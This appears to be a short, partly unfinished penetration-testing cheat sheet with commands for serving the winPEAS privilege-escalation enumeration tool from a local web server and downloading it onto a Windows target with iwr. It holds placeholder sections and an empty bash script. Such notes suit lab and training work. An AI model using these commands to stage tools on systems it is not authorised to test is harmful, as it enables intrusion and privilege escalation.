Pre-made commands

Copy winpeas to the working directory and start a web server
cp /usr/share/peass/winpeas/winPEASx64.exe . && python3 -m http.server 80
on windows, use iwr to retrieve the winpeas exe:
iwr -uri http://192.168.45.227:9876/windows/winPEASany.exe -Outfile winpeas.exe

Flags

FlagDescription
-xWhat does it do

Useful Scripts

Useful bash script
#!/bin/bash